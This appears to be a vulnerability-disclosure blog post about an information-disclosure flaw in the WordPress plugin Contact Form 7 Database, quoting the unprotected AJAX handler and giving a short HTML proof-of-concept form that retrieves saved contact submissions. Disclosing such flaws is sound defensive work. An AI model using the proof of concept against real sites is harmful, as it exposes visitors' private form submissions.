Login

Plugin Vulnerabilities

A service to protect your site against vulnerabilities in WordPress plugins.

Login
08 Jun

Authenticated Information Disclosure Vulnerability in Contact Form 7 Database

After noticing that another plugin that saves contact form submissions from the plugin Contact Form 7 made them publicly accessible we took a look other plugins that also save them to see if any of them had a similar issue. In doing that we found that the plugin Contact Form 7 Database made saved contact form submissions available to anyone logged in to WordPress.

The plugin makes the function cf7d_edit_value_ajax_func() available to those logged in, through WordPress’ AJAX functionality (in the file /admin\edit-value.php):

74

add_action('wp_ajax_cf7d_edit_value', 'cf7d_edit_value_ajax_func');

That function doesn’t perform any check as to the user role or capability before providing them with the content of a specified saved contact form submission:

75
76
77
78
79
80
81
82
83
84
85
86

function cf7d_edit_value_ajax_func()
{
    global $wpdb;
    $rid = ((isset($_POST['rid'])) ? (int)$_POST['rid'] : '');
    if (!empty($rid)) {
        $sql = $wpdb->prepare("SELECT * FROM ".$wpdb->prefix."cf7_data_entry WHERE `data_id` = %d", $rid);
        $rows = $wpdb->get_results($sql);
        $return = array();
        foreach ($rows as $k => $v) {
            $return[$v->name] = stripslashes($v->value);
        }
        exit(json_encode($return));

By comparison the page where that AJAX requests is made from by the plugin is limited to those with the manage_option capability, which using only Administrator-level users have (in the file /admin/init.php):

20

$menu = add_submenu_page('wpcf7', 'Database', 'Database', 'manage_options', 'cf7-data', 'cf7d_custom_submenu_page_callback');

When we notified the company behind the plugin of the vulnerability over a month ago and they responded “Our developers working to fix it.”, but the vulnerability has yet to be fixed.

Proof of Concept

The following proof of concept will show the first saved contact form submissions, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="cf7d_edit_value" />
<input type="hidden" name="rid" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • May 3, 2017 – Developer notified.
  • May 3, 2017 – Developer responds.

Related posts:

  1. Authenticated Information Disclosure Vulnerability in Email Log
  2. Information Disclosure Vulnerability in Save Contact Form 7
  3. Cross-Site Request Forgery (CSRF)/Form Submission Deletion Vulnerability in Contact Form 7 Database
  4. Reflected Cross-Site Scripting (XSS) Vulnerability in Contact Form 7 Database

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *